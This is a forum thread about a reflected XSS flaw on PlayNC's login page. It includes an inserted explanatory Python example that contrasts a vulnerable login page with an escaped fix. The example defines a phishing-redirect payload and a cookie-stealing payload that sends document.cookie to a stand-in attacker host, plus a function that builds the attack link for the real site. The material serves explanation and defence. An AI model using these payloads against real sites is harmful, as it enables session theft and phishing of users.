PlayNC XSS proof of concept

pablo24
Frost Gate Guardian
#1
https://secure.plaync.com/cgi-bin/plaync_login.pl

That's kinda stupid: the only serious XSS flaw I found on their site was right on the login page.
Gogo fix it!

Knew this for a while but I figured I'd post because I saw this thread http://www.guildwarsguru.com/forum/s...php?t=10047808.

Btw, don't be ashamed, PlayNC... Blizzard got the same problem on their e-card site, and it still hasn't been fixed even though I reported it like a year ago. =)

Edit: Fixed first link to work for most browsers.

Edit2: Yay it's fixed!
Kashrlyyk
Jungle Guide
#2
What? What? What?
pablo24
Frost Gate Guardian
#3
Quote:
Originally Posted by Kashrlyyk
What? What? What?
Click the linky
Kashrlyyk
Jungle Guide
#4
Quote:
Originally Posted by pablo24
Click the linky
Did that, one leads me to this thread and the other to the PlayNC login. So what should I see there?
Aba
Wilds Pathfinder
#5
Point??? Don't know what's going on.....
pablo24
Frost Gate Guardian
#6
Quote:
Originally Posted by Kashrlyyk
Did that, one leads me to this thread and the other to the PlayNC login. So what should I see there?
I only tested it on Firefox, you are probably using IE? Sec, lemme fix the link to work for IE too.
Kashrlyyk
Jungle Guide
#7
Quote:
Originally Posted by pablo24
I only tested it on Firefox, you are probably using IE? Sec, lemme fix the link to work for IE too.
Opera 9.26

Probably using IE? Should I feel insulted?
pablo24
Frost Gate Guardian
#8
Ok, edited the first link to work for most browsers.
Kusandaa
Forge Runner
#9
The only thing I see that's weird on the first is the series of %20 (spaces) and some other %## I don't remember ATM...

The other link goes right back at this thread.

Can you explain the whole problem though? Is it a security flaw or something?

EDIT: clicked on the link above... wtf... O_o;;...

EDIT2: Using Firefox ATM.
Witchblade
Polar Bear Attendant
#10
<-- Noob,
What's going on? ^^
Aba
Wilds Pathfinder
#11
I'm still wondering myself.
Used Firefox, still clueless.....

Is this what you're pointing to????


Quote:
Existing Customer
WHY?! Why does PlayNC have an XSS flaw right on their login page?
Alexandra-Sweet
Wilds Pathfinder
#12
In short, pablo24 found yet another exploit in PlayNC/Guild Wars that PlayNC/Arena Net can't be arsed to fix.
Rift
Frost Gate Guardian
#13
The security flaw is that their script will echo the HTML/JavaScript directly into your browser.

With this, a malicious user could steal a session from a user or, as in the first example, redirect the unsuspecting user to another webpage in the context of the plaync website (phishing).

Why? Because sadly even web developers these days fail to understand the severity of such an attack.
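The mechanism Rift describes, as an added example that is not part of the thread and is not PlayNC's code: a login CGI that writes a request parameter straight back into its HTML, beside the same page with the value escaped. The parameter name `msg`, the page markup and the `attacker.example` hostname are assumptions; the real plaync_login.pl script is not available here and may differ. Only the `/cgi-bin/plaync_login.pl` path is taken from the thread's first link.

```python
# Added example, not code from the thread or from PlayNC. It models the kind of
# reflected-XSS bug described in the post above: a login CGI that writes a request
# parameter straight back into the HTML it returns. The parameter name "msg", the
# page markup and the attacker hostname are assumptions.
import html
from urllib.parse import parse_qs, quote, urlencode

LOGIN_PATH = "/cgi-bin/plaync_login.pl"  # path from the thread's first link


def _notice_param(query_string: str) -> str:
    """Pull the hypothetical 'msg' parameter out of the query string (URL-decoded)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("msg", [""])[0]


def render_login_vulnerable(query_string: str) -> str:
    """Vulnerable version: the decoded parameter is interpolated as raw HTML,
    so a '<script>' in the query string becomes a live script on the page."""
    notice = _notice_param(query_string)
    return (
        "<html><body>"
        f"<p class='notice'>{notice}</p>"
        f"<form method='post' action='{LOGIN_PATH}'>"
        "<input name='user'><input name='pass' type='password'>"
        "<input type='submit' value='Log in'></form>"
        "</body></html>"
    )


def render_login_fixed(query_string: str) -> str:
    """Hardened version: same page, but the value is HTML-escaped for the
    element-body context it is written into, so '<' can never open a tag."""
    notice = html.escape(_notice_param(query_string), quote=True)
    return (
        "<html><body>"
        f"<p class='notice'>{notice}</p>"
        f"<form method='post' action='{LOGIN_PATH}'>"
        "<input name='user'><input name='pass' type='password'>"
        "<input type='submit' value='Log in'></form>"
        "</body></html>"
    )


def contains_script_tag(page: str) -> bool:
    """Crude detector for the demo: a literal '<script' in the response body."""
    return "<script" in page.lower()


# Constructed payloads for the two outcomes named in the post: a redirect to a
# look-alike login page (phishing) and cookie exfiltration. The hostname is made up.
REDIRECT_PAYLOAD = "<script>location='https://attacker.example/plaync-login'</script>"
COOKIE_PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def attack_url(payload: str) -> str:
    """The link a victim would be sent: the payload URL-encoded into the query
    string. Spaces become %20 and '<' becomes %3C, which is why such a link
    looks like a run of '%##' sequences."""
    return "https://secure.plaync.com" + LOGIN_PATH + "?" + urlencode({"msg": payload}, quote_via=quote)


def demo() -> dict:
    """For each payload: (vulnerable page contains live script, fixed page contains live script)."""
    results = {}
    for name, payload in (("redirect", REDIRECT_PAYLOAD), ("cookie", COOKIE_PAYLOAD)):
        qs = urlencode({"msg": payload}, quote_via=quote)
        results[name] = (
            contains_script_tag(render_login_vulnerable(qs)),
            contains_script_tag(render_login_fixed(qs)),
        )
    return results


if __name__ == "__main__":
    print(attack_url(REDIRECT_PAYLOAD))
    for name, (vuln, fixed) in demo().items():
        print(f"{name}: vulnerable page runs script={vuln}, fixed page runs script={fixed}")
```

Two caveats worth keeping in mind when reading the example. First, `html.escape` is the right fix only for the element-body and quoted-attribute contexts shown; a value written into a JavaScript string, a URL or an unquoted attribute needs that context's own encoding. Second, the page being served over HTTPS changes nothing here: the injected script runs with the site's origin, so the lock icon and certificate are genuine while the content is the attacker's. Marking the session cookie `HttpOnly` blunts the cookie-stealing payload but does nothing against the redirect variant.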
Kusandaa
Forge Runner
#14
Quote:
Originally Posted by Rift
The security flaw is that their script will echo the HTML/JavaScript directly into your browser.

With this, a malicious user could steal a session from a user or, as in the first example, redirect the unsuspecting user to another webpage in the context of the plaync website (phishing).

Why? Because sadly even web developers these days fail to understand the severity of such an attack.
Thanks for giving me an explanation I can actually understand

Could that be where the possible hacker got his info from? Regarding the hacked accounts thread thingy... I say it's possible >_>.
Sleeper Service
Jungle Guide
#16
The normal site is secured and the fake one isn't.
But yeah, someone could use that to steal login and pass.... Ironic, no?
Malice Black
Site Legend
#17
Less geek, more street?
pablo24
Frost Gate Guardian
#18
Quote:
Originally Posted by Sleeper Service
The normal site is secured and the fake one isn't.
But yeah, someone could use that to steal login and pass.... Ironic, no?
With some tweaking the modified site would be secure too.
Kusandaa
Forge Runner
#19
Quote:
Originally Posted by Sleeper Service
The normal site is secured and the fake one isn't.
But yeah, someone could use that to steal login and pass.... Ironic, no?
Actually, if I understood correctly, the REAL site (the https:// one) IS flawed... flawed so much that someone can redirect to that object that totally creeped me out (wasn't expecting it at all and my speakers were loud x];;; )

But I could be wrong. I'm no expert.
slowerpoke
Desert Nomad
#20
If this is an exploit you should prolly report it to them and not advertise it here.